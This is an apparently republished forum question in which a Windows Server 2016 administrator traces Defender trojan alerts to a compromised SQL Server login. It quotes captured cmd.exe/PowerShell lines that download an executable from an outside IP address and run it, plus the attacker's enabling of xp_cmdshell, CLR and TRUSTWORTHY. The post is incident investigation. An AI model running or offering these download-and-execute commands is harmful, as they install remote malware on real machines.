• caglararli@hotmail.com
  • 05386281520

How to find the process that is running PowerShell commands that appear in Windows Defender

Çağlar Arlı      -    53 Views

How to find the process that is running PowerShell commands that appear in Windows Defender

On one of our Windows Datacenter 2016, there's an alert that a trojan is trying to install : enter image description here

The following PowerShell commands are trying to execute at seemingly random hours of the day (always during working hours, one to two times a day, sometimes there are a few days between attempts which makes me think it's embedded in a file that is executed by the users of the machine)

CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, %TEMP%\tzt.exe) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create %TEMP%\tzt.exe
CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe) >> C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & WMIC process call create C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe

So I suppose it's embedded in some kind of other files, or through a network attack, but I don't know how to investigate this to know which service/file is faulty.

Edit :

I checked into the event viewer : system logs and the detections hours by windows defender coincides with the service : App deployment services starting

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
  <Provider Name="Service Control Manager" Guid="{xxx-a6d7-4695-8e1e-xxx012f4}" EventSourceName="Service Control Manager" /> 
  <EventID Qualifiers="16384">7036</EventID> 
  <Version>0</Version> 
  <Level>4</Level> 
  <Task>0</Task> 
  <Opcode>0</Opcode> 
  <Keywords>0x8080000000000000</Keywords> 
  <TimeCreated SystemTime="2023-03-03T13:36:51.390130000Z" /> 
  <EventRecordID>685207</EventRecordID> 
  <Correlation /> 
  <Execution ProcessID="708" ThreadID="13796" /> 
  <Channel>System</Channel> 
  <Computer>xxxx</Computer> 
  <Security /> 
  </System>
- <EventData>
  <Data Name="param1">AppX Deployment Service (AppXSVC)</Data> 
  <Data Name="param2">running</Data> 
  <Binary>4100700070005800xx4000000</Binary> 
  </EventData>
  </Event>

In the event viewer > Windows logs > Application I found that the following values are changed at the time Windows defender is triggered :

  • TRUSTWORTHY new value ON for database msdb
  • 'clr enabled' new value : 1
  • 'show advanced options' new value : 1
  • ''xp_cmdshell' new value : 1

Comming from user : MSSQL$SAGE100 which is a the sys sql user

enter image description here

So i suppose the user has been compromised and is used to try to issue powershell commands to the vm, I have enabled the logging for successful logins on the sql server to see if the commands are issued through an application or directly from the network.

After another attack yesterday I can confirm that someone is logging from outside with the correct credentials for an sql user of my sql server and uses this user to conduct the attack.